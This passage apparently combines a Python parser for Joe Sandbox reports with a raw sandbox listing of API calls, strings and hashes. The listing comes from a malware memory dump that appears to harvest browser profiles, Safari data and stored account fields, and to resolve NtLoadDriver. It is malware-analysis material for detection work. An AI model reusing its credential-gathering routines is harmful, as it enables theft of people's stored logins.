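• CloseClipboard.USER32 ref: 004098D7
• Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
"""

# One API line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Name.MODULE(args), ref: ADDR   (the argument list and the comma are optional).
API_LINE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
META_LINE = re.compile(r"^•\s+(?P<key>API ID|String ID|Opcode ID): ?(?P<val>.*)$")
CF_UNICODETEXT = 0xD  # Win32 clipboard format id passed as SetClipboardData's first argument

def parse_blocks(text):
    """Split the listing into per-function blocks: {'calls': [...], 'meta': {...}}."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":  # every function entry in the report opens with this header
            cur = {"calls": [], "meta": {}}
            blocks.append(cur)
        elif cur is not None and (m := API_LINE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur["calls"].append({"api": m["api"], "mod": m["mod"], "args": args,
                                 "ref": m["ref"], "subcall": m["sub"]})
        elif cur is not None and (m := META_LINE.match(line)):
            cur["meta"][m["key"]] = m["val"]
    return blocks

def _hex_arg(call, idx):
    """Integer value of argument idx, or None when it is '?' or absent."""
    try:
        return int(call["args"][idx], 16)
    except (IndexError, ValueError):
        return None

def classify(block):
    """Return (tag, detail) findings for one function; heuristics are the editor's own."""
    calls, names = block["calls"], {c["api"] for c in block["calls"]}
    findings = []
    # Complete clipboard write: Empty -> GlobalAlloc/Lock/copy -> SetClipboardData -> Close.
    if {"EmptyClipboard", "SetClipboardData", "CloseClipboard"} <= names:
        fmts = [_hex_arg(c, 0) for c in calls if c["api"] == "SetClipboardData"]
        kind = "unicode text" if CF_UNICODETEXT in fmts else "format(s) %s" % fmts
        src = "file contents" if "ReadFile" in names else "in-memory buffer"
        findings.append(("clipboard_write", "%s from %s" % (kind, src)))
    # Run-time import resolution; the resolved names decide whether it is suspicious.
    if {"LoadLibraryW", "LoadLibraryA"} & names and "GetProcAddress" in names:
        libs = [c["args"][0] for c in calls if c["api"].startswith("LoadLibrary") and c["args"]]
        procs = [c["args"][1] for c in calls if c["api"] == "GetProcAddress" and len(c["args"]) > 1]
        findings.append(("dynamic_import", "%s -> %s" % (", ".join(libs), ", ".join(procs))))
    return findings

def scan(text):
    """Map each flagged function's Opcode ID (or first call address) to its findings."""
    report = {}
    for b in parse_blocks(text):
        key = b["meta"].get("Opcode ID") or (b["calls"][0]["ref"] if b["calls"] else "?")
        found = classify(b)
        if found:
            report[key] = found
    return report
```

scan(SAMPLE) returns the three Opcode IDs mapped to their findings. The comctl32 entry is the reason the dynamic-import heuristic carries the resolved name: InitCommonControlsEx is ordinary GUI start-up code, whereas the same LoadLibrary/GetProcAddress shape resolving a networking or injection API would deserve a closer look. Subcall lines keep their parent function address, so the CreateFileW that feeds the first clipboard write is attributed to 004096C3 rather than to the clipboard routine itself.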
                                                                            APIs
                                                                            • GetLastError.KERNEL32 ref: 004182D7
                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                            • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                            • LocalFree.KERNEL32(?), ref: 00418342
                                                                            • free.MSVCRT ref: 00418370
                                                                              • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,774CDF80,?,0041755F,?), ref: 00417452
                                                                              • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                            • String ID: OsError 0x%x (%u)
                                                                            • API String ID: 2360000266-2664311388
                                                                            • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                            • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                            • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                            • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@memcpymemset
                                                                            • String ID:
                                                                            • API String ID: 1865533344-0
                                                                            • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                            • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                            • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                            • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                            APIs
                                                                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: NtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 4255912815-0
                                                                            • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                            • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                            • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                            • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                            APIs
                                                                            • _wcsicmp.MSVCRT ref: 004022A6
                                                                            • _wcsicmp.MSVCRT ref: 004022D7
                                                                            • _wcsicmp.MSVCRT ref: 00402305
                                                                            • _wcsicmp.MSVCRT ref: 00402333
                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                            • memset.MSVCRT ref: 0040265F
                                                                            • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                            • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                            • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                            • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                            • API String ID: 577499730-1134094380
                                                                            • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                            • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                            • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                            • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                            • String ID: :stringdata$ftp://$http://$https://
                                                                            • API String ID: 2787044678-1921111777
                                                                            • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                            • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                            • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                            • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                            • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                            • GetWindowRect.USER32(?,?), ref: 00414088
                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                            • GetDC.USER32 ref: 004140E3
                                                                            • wcslen.MSVCRT ref: 00414123
                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                            • ReleaseDC.USER32(?,?), ref: 00414181
                                                                            • _snwprintf.MSVCRT ref: 00414244
                                                                            • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                            • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                            • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                            • GetClientRect.USER32(?,?), ref: 004142E1
                                                                            • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                            • GetClientRect.USER32(?,?), ref: 0041433B
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                            • String ID: %s:$EDIT$STATIC
                                                                            • API String ID: 2080319088-3046471546
                                                                            • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                            • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                            • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                            • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                            APIs
                                                                            • EndDialog.USER32(?,?), ref: 00413221
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                            • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                            • memset.MSVCRT ref: 00413292
                                                                            • memset.MSVCRT ref: 004132B4
                                                                            • memset.MSVCRT ref: 004132CD
                                                                            • memset.MSVCRT ref: 004132E1
                                                                            • memset.MSVCRT ref: 004132FB
                                                                            • memset.MSVCRT ref: 00413310
                                                                            • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                            • memset.MSVCRT ref: 004133C0
                                                                            • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                            • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                            • wcscpy.MSVCRT ref: 0041341F
                                                                            • _snwprintf.MSVCRT ref: 0041348E
                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                            • SetFocus.USER32(00000000), ref: 004134B7
                                                                            Strings
                                                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                            • {Unknown}, xrefs: 004132A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                            • API String ID: 4111938811-1819279800
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                            • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                            • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                            • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                            • EndDialog.USER32(?,?), ref: 0040135E
                                                                            • DeleteObject.GDI32(?), ref: 0040136A
                                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                            • ShowWindow.USER32(00000000), ref: 00401398
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                            • ShowWindow.USER32(00000000), ref: 004013A7
                                                                            • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                            • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                            • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                            Similarity
                                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                            • String ID:
                                                                            • API String ID: 829165378-0
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00404172
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            • wcscpy.MSVCRT ref: 004041D6
                                                                            • wcscpy.MSVCRT ref: 004041E7
                                                                            • memset.MSVCRT ref: 00404200
                                                                            • memset.MSVCRT ref: 00404215
                                                                            • _snwprintf.MSVCRT ref: 0040422F
                                                                            • wcscpy.MSVCRT ref: 00404242
                                                                            • memset.MSVCRT ref: 0040426E
                                                                            • memset.MSVCRT ref: 004042CD
                                                                            • memset.MSVCRT ref: 004042E2
                                                                            • _snwprintf.MSVCRT ref: 004042FE
                                                                            • wcscpy.MSVCRT ref: 00404311
                                                                            Similarity
                                                                            • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                            • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                            • API String ID: 2454223109-1580313836
                                                                            APIs
                                                                              • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                            • SetMenu.USER32(?,00000000), ref: 00411453
                                                                            • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                            • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                            • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                            • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                            • ShowWindow.USER32(?,?), ref: 004115FE
                                                                            • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                            • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                            • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                            • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                            • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                              • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                              • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                            Similarity
                                                                            • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                            • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                            • API String ID: 4054529287-3175352466
                                                                            Similarity
                                                                            • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                            • API String ID: 3143752011-1996832678
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                            • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                            • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                            • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                            • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                            • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                            • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                            • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                            • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                            • API String ID: 667068680-2887671607
                                                                            Similarity
                                                                            • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                            • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                            • API String ID: 1607361635-601624466
                                                                            Similarity
                                                                            • API ID: _snwprintf$memset$wcscpy
                                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                            • API String ID: 2000436516-3842416460
                                                                            APIs
                                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                              • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                              • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                              • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                            • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                            • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                            • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                            • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                            • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                            • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                            • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                            • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                            • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                            Similarity
                                                                            • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                            • String ID:
                                                                            • API String ID: 1043902810-0
                                                                            APIs
                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                            • free.MSVCRT ref: 0040E49A
                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                            • memset.MSVCRT ref: 0040E380
                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                            • wcschr.MSVCRT ref: 0040E3B8
                                                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,774D2EE0), ref: 0040E3EC
                                                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,774D2EE0), ref: 0040E407
                                                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,774D2EE0), ref: 0040E422
                                                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,774D2EE0), ref: 0040E43D
                                                                            Similarity
                                                                            • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                            • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                            • API String ID: 3849927982-2252543386
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                            • _snwprintf.MSVCRT ref: 0044488A
                                                                            • wcscpy.MSVCRT ref: 004448B4
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: ??2@??3@_snwprintfwcscpy
                                                                            • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                            • API String ID: 2899246560-1542517562
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040DBCD
                                                                            • memset.MSVCRT ref: 0040DBE9
                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                              • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                              • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                              • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                            • wcscpy.MSVCRT ref: 0040DC2D
                                                                            • wcscpy.MSVCRT ref: 0040DC3C
                                                                            • wcscpy.MSVCRT ref: 0040DC4C
                                                                            • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                            • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                            • wcscpy.MSVCRT ref: 0040DCC3
                                                                            Similarity
                                                                            • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                            • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                            • API String ID: 3330709923-517860148
                                                                            APIs
                                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                            • memset.MSVCRT ref: 0040806A
                                                                            • memset.MSVCRT ref: 0040807F
                                                                            • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                            • _wcsicmp.MSVCRT ref: 004081C3
                                                                            • memset.MSVCRT ref: 004081E4
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                              • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
